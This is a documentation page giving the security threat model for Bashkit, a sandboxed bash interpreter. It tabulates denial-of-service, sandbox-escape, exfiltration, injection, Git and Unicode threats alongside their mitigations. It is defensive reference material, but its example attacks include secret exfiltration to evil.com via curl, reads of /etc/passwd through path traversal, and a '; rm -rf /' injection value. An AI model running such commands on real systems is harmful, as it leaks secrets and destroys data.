Skip to main content

Module threat_model

Module threat_model 

Source
Expand description

Security threat model guide.

This guide documents security threats addressed by Bashkit and their mitigations. All threats use stable IDs for tracking and code references.

Topics covered:

  • Denial of Service mitigations (TM-DOS-*)
  • Sandbox escape prevention (TM-ESC-*)
  • Information disclosure protection (TM-INF-*)
  • Network security controls (TM-NET-*)
  • Multi-tenant isolation (TM-ISO-*)

Related: ExecutionLimits, FsLimits, NetworkAllowlist

§Threat Model

Bashkit is designed to execute untrusted bash scripts safely in virtual environments. This document describes the security threats we address and how they are mitigated.

See also:

§Overview

Bashkit assumes all script input is potentially malicious. The virtual environment prevents:

  • Resource exhaustion (CPU, memory, disk)
  • Sandbox escape (filesystem, process, privilege)
  • Information disclosure (secrets, host info)
  • Network abuse (exfiltration, unauthorized access)

§Threat Categories

§Denial of Service (TM-DOS-*)

Scripts may attempt to exhaust system resources. Bashkit mitigates these attacks through configurable limits.

ThreatAttack ExampleMitigationCode Reference
Large input (TM-DOS-001)1GB scriptmax_input_bytes limitlimits.rs
Infinite loops (TM-DOS-016)while true; do :; donemax_loop_iterationslimits.rs
Recursion (TM-DOS-020)f() { f; }; fmax_function_depthlimits.rs
Parser depth (TM-DOS-022)(((((...)))))) nestingmax_ast_depth + hard cap (100)parser/mod.rs
Command sub depth (TM-DOS-021)$($($($()))) nestingInherited depth/fuel from parentparser/mod.rs
Arithmetic depth (TM-DOS-026)$(((((...))))))MAX_ARITHMETIC_DEPTH (50)interpreter/mod.rs
Parser attack (TM-DOS-024)Malformed inputparser_timeoutlimits.rs
Filesystem bomb (TM-DOS-007)Zip bomb extractionFsLimitsfs/limits.rs
Many files (TM-DOS-006)Create 1M filesmax_file_countfs/limits.rs
TOCTOU append (TM-DOS-034)Concurrent appends bypass limitsSingle write lockOPEN
OverlayFs limit gaps (TM-DOS-035-038)CoW/whiteout/accounting bugsCombined limit accountingOPEN
Missing validate_path (TM-DOS-039)VFS methods skip path checksAdd to all methodsOPEN
Diff algorithm DoS (TM-DOS-028)diff on large unrelated filesLCS matrix cap (10M cells)builtins/diff.rs
Arithmetic overflow (TM-DOS-029)$(( 2 ** -1 ))Use wrapping arithmeticOPEN
Parser limit bypass (TM-DOS-030)eval/source ignore limitsUse Parser::with_limits()OPEN
ExtGlob blowup (TM-DOS-031)+(a|aa) exponentialAdd depth limitOPEN

Configuration:

use bashkit::{Bash, ExecutionLimits, FsLimits, InMemoryFs};
use std::sync::Arc;
use std::time::Duration;

let limits = ExecutionLimits::new()
    .max_commands(10_000)
    .max_loop_iterations(10_000)
    .max_function_depth(100)
    .timeout(Duration::from_secs(30))
    .max_input_bytes(10_000_000);  // 10MB

let fs_limits = FsLimits::new()
    .max_total_bytes(100_000_000)  // 100MB
    .max_file_size(10_000_000)     // 10MB per file
    .max_file_count(10_000);

let fs = Arc::new(InMemoryFs::with_limits(fs_limits));
let bash = Bash::builder()
    .limits(limits)
    .fs(fs)
    .build();

§Sandbox Escape (TM-ESC-*)

Scripts may attempt to break out of the sandbox to access the host system.

ThreatAttack ExampleMitigationCode Reference
Path traversal (TM-ESC-001)cat /../../../etc/passwdPath normalizationfs/memory.rs
Symlink escape (TM-ESC-002)ln -s /etc/passwd /tmp/xSymlinks not followedfs/memory.rs
Shell escape (TM-ESC-005)exec /bin/bashNot implementedReturns exit 127
External commands (TM-ESC-006)./maliciousNo external execReturns exit 127
eval injection (TM-ESC-008)eval "$input"Sandboxed evalOnly runs builtins
VFS limit bypass (TM-ESC-012)add_file() skips limitsRestrict API visibilityOPEN
Custom builtins lost (TM-ESC-014)std::mem::take empties builtinsClone/Arc builtinsOPEN

Virtual Filesystem:

Bashkit uses an in-memory virtual filesystem by default. Scripts cannot access the real filesystem unless explicitly mounted via MountableFs.

use bashkit::{Bash, InMemoryFs, MountableFs};
use std::sync::Arc;

// Default: fully isolated in-memory filesystem
let bash = Bash::new();

// Custom filesystem with explicit mounts (advanced)
let root = Arc::new(InMemoryFs::new());
let fs = Arc::new(MountableFs::new(root));
// fs.mount("/data", Arc::new(InMemoryFs::new()));  // Mount additional filesystems

§Information Disclosure (TM-INF-*)

Scripts may attempt to leak sensitive information.

ThreatAttack ExampleMitigationCode Reference
Env var leak (TM-INF-001)echo $SECRETCaller responsibilitySee below
Host info (TM-INF-005)hostnameReturns virtual valuebuiltins/system.rs
Network exfil (TM-INF-010)curl evil.com?d=$SECRETNetwork allowlistnetwork/allowlist.rs
Host env via jq (TM-INF-013)jq env exposes host envCustom env via $__bashkit_env__FIXED
Real PID leak (TM-INF-014)$$ returns real PIDReturns virtual PID (1)FIXED
Error msg info leak (TM-INF-016)Errors expose host paths/IPsSanitize error messagesOPEN

Caller Responsibility (TM-INF-001):

Do NOT pass sensitive environment variables to untrusted scripts:

// UNSAFE - secrets may be leaked
let bash = Bash::builder()
    .env("DATABASE_URL", "postgres://user:pass@host/db")
    .env("API_KEY", "sk-secret-key")
    .build();

// SAFE - only pass non-sensitive variables
let bash = Bash::builder()
    .env("HOME", "/home/user")
    .env("TERM", "xterm")
    .build();

System Information:

System builtins return configurable virtual values, never real host information:

let bash = Bash::builder()
    .username("sandbox")         // whoami returns "sandbox"
    .hostname("bashkit-sandbox") // hostname returns "bashkit-sandbox"
    .build();

§Network Security (TM-NET-*)

Network access is disabled by default. When enabled, strict controls apply.

ThreatAttack ExampleMitigationCode Reference
Unauthorized access (TM-NET-004)curl http://internal:8080URL allowlistnetwork/allowlist.rs
Large response (TM-NET-008)10GB downloadSize limit (10MB)network/client.rs
Redirect bypass (TM-NET-011)Redirect to evil.comNo auto-redirectnetwork/client.rs
Compression bomb (TM-NET-013)10KB → 10GB gzipNo auto-decompressnetwork/client.rs

Network Allowlist:

use bashkit::{Bash, NetworkAllowlist};

// Explicit allowlist - only these URLs can be accessed
let allowlist = NetworkAllowlist::new()
    .allow("https://api.example.com")
    .allow("https://cdn.example.com/assets/");

let bash = Bash::builder()
    .network(allowlist)
    .build();

// Scripts can now use curl/wget, but only to allowed URLs
// curl https://api.example.com/data  → allowed
// curl https://evil.com              → blocked (exit 7)

Domain Allowlist (TM-NET-015, TM-NET-016):

For simpler domain-level control, allow_domain() permits all traffic to a domain regardless of scheme, port, or path. This is the virtual equivalent of SNI-based egress filtering — the same approach used by production sandbox environments.

use bashkit::{Bash, NetworkAllowlist};

// Domain-level: any scheme, port, or path to these hosts
let allowlist = NetworkAllowlist::new()
    .allow_domain("api.example.com")
    .allow_domain("cdn.example.com");

// Both of these are allowed:
// curl https://api.example.com/v1/data
// curl http://api.example.com:8080/health

Trade-off: domain rules intentionally skip scheme and port enforcement. Use URL patterns (allow()) when you need tighter control. Both can be combined.

No Wildcard Subdomains (TM-NET-017):

Wildcard patterns like *.example.com are not supported. They would enable data exfiltration by encoding secrets in subdomains (curl https://$SECRET.example.com).

§Injection Attacks (TM-INJ-*)

ThreatAttack ExampleMitigation
Command injection (TM-INJ-001)$input containing ; rm -rf /Variables expand to strings only
Path injection (TM-INJ-005)../../../../etc/passwdPath normalization
Terminal escapes (TM-INJ-008)ANSI sequences in outputCaller should sanitize
Internal var injection (TM-INJ-009)Set _READONLY_X=""Isolate internal namespace
Tar path traversal (TM-INJ-010)tar -xf with ../ entriesValidate extract paths
Cyclic nameref (TM-INJ-011)Cyclic refs resolve silentlyDetect cycle, error

Variable Expansion:

Variables expand to literal strings, not re-parsed as commands:

# If user_input contains "; rm -rf /"
user_input="; rm -rf /"
echo $user_input
# Output: "; rm -rf /" (literal string, NOT executed)

§Multi-Tenant Isolation (TM-ISO-*)

Each Bash instance is fully isolated. For multi-tenant environments, create separate instances per tenant:

use bashkit::{Bash, InMemoryFs};
use std::sync::Arc;

// Each tenant gets completely isolated instance
let tenant_a = Bash::builder()
    .fs(Arc::new(InMemoryFs::new()))  // Separate filesystem
    .build();

let tenant_b = Bash::builder()
    .fs(Arc::new(InMemoryFs::new()))  // Different filesystem
    .build();

// tenant_a cannot access tenant_b's files or state

§Internal Error Handling (TM-INT-*)

Bashkit is designed to never crash, even when processing malicious or malformed input. All unexpected errors are caught and converted to safe, human-readable messages.

ThreatAttack ExampleMitigationCode Reference
Builtin panic (TM-INT-001)Trigger panic in builtincatch_unwind wrapperinterpreter/mod.rs
Info leak in panic (TM-INT-002)Panic exposes secretsSanitized error messagesinterpreter/mod.rs
Date format crash (TM-INT-003)Invalid strftime: +%QPre-validationbuiltins/date.rs

Panic Recovery:

All builtins (both built-in and custom) are wrapped with panic catching:

If a builtin panics, the script continues with a sanitized error.
The panic message is NOT exposed (may contain sensitive data).
Output: "bash: <command>: builtin failed unexpectedly"

Error Message Safety:

Error messages never expose:

  • Stack traces or call stacks
  • Memory addresses
  • Real filesystem paths (only virtual paths)
  • Panic messages that may contain secrets

§Logging Security (TM-LOG-*)

When the logging feature is enabled, Bashkit emits structured logs. Security features prevent sensitive data leakage:

ThreatAttack ExampleMitigation
Secrets in logs (TM-LOG-001)Log $PASSWORD valueEnv var redaction
Script leak (TM-LOG-002)Log script with embedded secretsScript content disabled by default
URL credentials (TM-LOG-003)Log https://user:pass@hostURL credential redaction
API key leak (TM-LOG-004)Log JWT or API key valuesEntropy-based detection
Log injection (TM-LOG-005)Script with \n[ERROR]Newline escaping

Logging Configuration:

use bashkit::{Bash, LogConfig};

// Default: secure (redaction enabled, script content hidden)
let bash = Bash::builder()
    .log_config(LogConfig::new())
    .build();

// Add custom redaction patterns
let bash = Bash::builder()
    .log_config(LogConfig::new()
        .redact_env("MY_CUSTOM_SECRET"))
    .build();

Warning: Do not use LogConfig::unsafe_disable_redaction() or LogConfig::unsafe_log_scripts() in production.

§Parser Depth Protection

The parser includes multiple layers of depth protection to prevent stack overflow attacks:

  1. Configurable depth limit (max_ast_depth, default 100): Controls maximum nesting of compound commands (if/for/while/case/subshell).

  2. Hard cap (HARD_MAX_AST_DEPTH = 100): Even if the caller configures a higher max_ast_depth, the parser clamps it to 100. This prevents misconfiguration from causing stack overflow.

  3. Child parser inheritance (TM-DOS-021): When parsing $(...) or <(...), the child parser inherits the remaining depth budget and fuel from the parent. This prevents attackers from bypassing depth limits through nested substitutions.

  4. Arithmetic depth limit (TM-DOS-026): The arithmetic evaluator ($((expr))) has its own depth limit (MAX_ARITHMETIC_DEPTH = 50) to prevent stack overflow from deeply nested parenthesized expressions.

  5. Parser fuel (max_parser_operations, default 100K): Independent of depth, limits total parser work to prevent CPU exhaustion.

§Python / Monty Security (TM-PY-*)

The python/python3 builtins embed the Monty Python interpreter with VFS bridging. Python pathlib.Path operations are bridged to Bashkit’s virtual filesystem.

ThreatAttack ExampleMitigation
Infinite loop (TM-PY-001)while True: passMonty time limit (30s) + allocation cap
Memory exhaustion (TM-PY-002)Large allocationMonty max_memory (64MB) + max_allocations (1M)
Stack overflow (TM-PY-003)Deep recursionMonty max_recursion (200)
Shell escape (TM-PY-004)os.system()Monty has no os.system/subprocess
Real FS access (TM-PY-005)open()Monty has no open() builtin
Real FS read (TM-PY-015)Path.read_text()VFS bridge reads only from BashKit VFS
Real FS write (TM-PY-016)Path.write_text()VFS bridge writes only to BashKit VFS
Path traversal (TM-PY-017)../../etc/passwdVFS path normalization
Network access (TM-PY-020)Socket/HTTPMonty has no socket/network module
VM crash (TM-PY-022)Malformed inputParser depth limit + resource limits
Shell injection (TM-PY-023)deepagents.py f-stringsUse shlex.quote()
Heredoc escape (TM-PY-024)Content contains delimiterRandom delimiter
GIL deadlock (TM-PY-025)execute_sync holds GILpy.allow_threads()
Config lost on reset (TM-PY-026)reset() drops limitsPreserve config
JSON recursion (TM-PY-027)Nested dicts overflow stackAdd depth limit

Architecture:

Python code → Monty VM → OsCall pause → BashKit VFS bridge → resume

Monty runs directly in the host process. Resource limits (memory, allocations, time, recursion) are enforced by Monty’s own runtime. All VFS operations are bridged through the host process — Python code never touches the real filesystem.

§Git Security (TM-GIT-*)

Optional virtual git operations via the git feature. All operations are confined to the virtual filesystem.

ThreatAttack ExampleMitigationStatus
Host identity leak (TM-GIT-002)Commit reveals real name/emailConfigurable virtual identityMITIGATED
Host git config (TM-GIT-003)Read ~/.gitconfigNo host filesystem accessMITIGATED
Credential theft (TM-GIT-004)Access credential storeNo host filesystem accessMITIGATED
Repository escape (TM-GIT-005)Clone outside VFSAll paths in VFSMITIGATED
Many git objects (TM-GIT-007)Millions of objectsmax_file_count FS limitMITIGATED
Deep history (TM-GIT-008)Very long commit logLog limit parameterMITIGATED
Large pack files (TM-GIT-009)Huge .git/objects/packmax_file_size FS limitMITIGATED
Branch name injection (TM-GIT-014)git branch ../../configValidate branch namesOPEN
Unauthorized clone (TM-GIT-001)git clone evil.comRemote URL allowlistPLANNED (Phase 2)
Push to unauthorized (TM-GIT-010)git push evil.comRemote URL allowlistPLANNED (Phase 2)

Virtual Identity:

use bashkit::Bash;

let bash = Bash::builder()
    .git_author("sandbox", "sandbox@example.com")
    .build();
// Commits use virtual identity, never host ~/.gitconfig

§Unicode Security (TM-UNI-*)

Unicode input from untrusted scripts creates attack surface across the parser, builtins, and virtual filesystem. AI agents frequently generate multi-byte Unicode (box-drawing, emoji, CJK) that exercises these code paths.

Byte-Boundary Safety (TM-UNI-001/002/015/016/017):

Multiple builtins mix byte offsets with character indices, causing panics on multi-byte input. All are caught by catch_unwind (TM-INT-001) preventing process crash, but the builtin silently fails.

ThreatAttack ExampleMitigationStatus
Awk byte-boundary panic (TM-UNI-001)Multi-byte chars in awk inputcatch_unwind catches panicPARTIAL
Sed byte-boundary panic (TM-UNI-002)Box-drawing chars in sed patterncatch_unwind catches panicPARTIAL
Expr substr panic (TM-UNI-015)expr substr "café" 4 1catch_unwind catches panicPARTIAL
Printf precision panic (TM-UNI-016)printf "%.1s" "é"catch_unwind catches panicPARTIAL
Cut/tr byte-level parsing (TM-UNI-017)tr 'é' 'e' — multi-byte in char setcatch_unwind catches; silent data lossPARTIAL

Additional Byte/Char Confusion:

ThreatAttack ExampleMitigationStatus
Interpreter arithmetic (TM-UNI-018)Multi-byte before = in arithmeticWrong operator detection; no panicPARTIAL
Network allowlist (TM-UNI-019)Multi-byte in allowlist URL pathWrong path boundary checkPARTIAL
Zero-width in filenames (TM-UNI-003)Invisible chars create confusable namesPath validation (planned)UNMITIGATED
Homoglyph confusion (TM-UNI-006)Cyrillic ‘а’ vs Latin ‘a’ in filenamesAccepted riskACCEPTED
Normalization bypass (TM-UNI-008)NFC vs NFD create distinct filesMatches Linux FS behaviorACCEPTED
Bidi in script source (TM-UNI-014)RTL overrides hide malicious codeScripts untrusted by designACCEPTED

Safe Components (confirmed by full codebase audit):

  • Lexer: Chars iterator with ch.len_utf8() tracking
  • wc: Correct .len() vs .chars().count() usage
  • grep/jq: Delegate to Unicode-aware regex/jaq crates
  • sort/uniq: String comparison, no byte indexing
  • logging: Uses is_char_boundary() correctly
  • python: Shebang strip via find('\n') — ASCII delimiter, safe
  • Python bindings (bashkit-python): PyO3 String extraction, no manual byte/char ops
  • eval harness: chars().take(), from_utf8_lossy() — all safe patterns
  • curl/bc/export/date/comm/echo/archive/base64: All .find() use ASCII delimiters only
  • scripted_tool: No byte/char patterns

Path Validation:

Filenames are validated by find_unsafe_path_char() which rejects:

  • ASCII control characters (U+0000-U+001F, U+007F)
  • C1 control characters (U+0080-U+009F)
  • Bidi override characters (U+202A-U+202E, U+2066-U+2069)

Normal Unicode (accented, CJK, emoji) is allowed in filenames and script content.

Caller Responsibility:

  • Strip zero-width/invisible characters from filenames before displaying to users
  • Apply confusable-character detection (UTS #39) if showing filenames to humans
  • Strip bidi overrides from script source before displaying to code reviewers
  • Be aware that expr/printf/cut/tr may fail on non-ASCII input until fixes land
  • Use ASCII in network allowlist URL patterns until byte/char fix lands

§Security Testing

Bashkit includes comprehensive security tests:

  • Threat Model Tests: tests/threat_model_tests.rs - 117 tests
  • Unicode Security Tests: tests/unicode_security_tests.rs - TM-UNI-* tests
  • Nesting Depth Tests: 18 tests covering positive, negative, misconfiguration, and regression scenarios for parser depth attacks
  • Fail-Point Tests: tests/security_failpoint_tests.rs - 14 tests
  • Network Security: tests/network_security_tests.rs - 53 tests
  • Builtin Error Security: tests/builtin_error_security_tests.rs - 39 tests
  • Logging Security: tests/logging_security_tests.rs - 26 tests
  • Git Security: tests/git_security_tests.rs + tests/git_remote_security_tests.rs
  • Fuzz Testing: fuzz/ - Parser and lexer fuzzing

§Reporting Security Issues

If you discover a security vulnerability, please report it privately via GitHub Security Advisories rather than opening a public issue.

§Threat ID Reference

All threats use stable IDs in the format TM-<CATEGORY>-<NUMBER>:

PrefixCategory
TM-DOSDenial of Service
TM-ESCSandbox Escape
TM-INFInformation Disclosure
TM-INJInjection
TM-NETNetwork Security
TM-ISOMulti-Tenant Isolation
TM-INTInternal Error Handling
TM-LOGLogging Security
TM-GITGit Security
TM-PYPython/Monty Security
TM-UNIUnicode Security

Full threat analysis: specs/006-threat-model.md